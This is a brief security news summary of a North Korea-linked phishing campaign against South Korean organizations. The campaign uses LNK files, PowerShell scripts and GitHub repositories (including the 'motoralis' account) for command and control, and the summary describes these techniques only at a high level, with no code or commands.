North Korea-linked threat actors are targeting South Korean organizations by using GitHub as a command-and-control server to distribute malicious LNK files and execute stealthy PowerShell-based cyberattacks.

Key Points

• Attackers use phishing emails containing obfuscated LNK files that drop decoy PDF documents and malicious PowerShell scripts.
• The campaign leverages GitHub repositories, including the primary "motoralis" account, to host payloads and exfiltrate stolen system data.
• Malicious scripts employ anti-analysis checks to detect security tools and establish persistence through scheduled Windows tasks.
• Threat actors utilize multiple active and dormant GitHub accounts to maintain operational redundancy and evade detection by corporate security filters.
• The malware uses a "keep-alive" script to upload network configuration logs to GitHub, enabling real-time monitoring of compromised environments.

Why it Matters

This campaign demonstrates how sophisticated threat actors exploit trusted platforms like GitHub to bypass traditional network security filters and blend malicious traffic with legitimate activity. By relying on built-in Windows tools rather than custom malware, these attackers significantly reduce their digital footprint and complicate detection efforts for corporate security teams.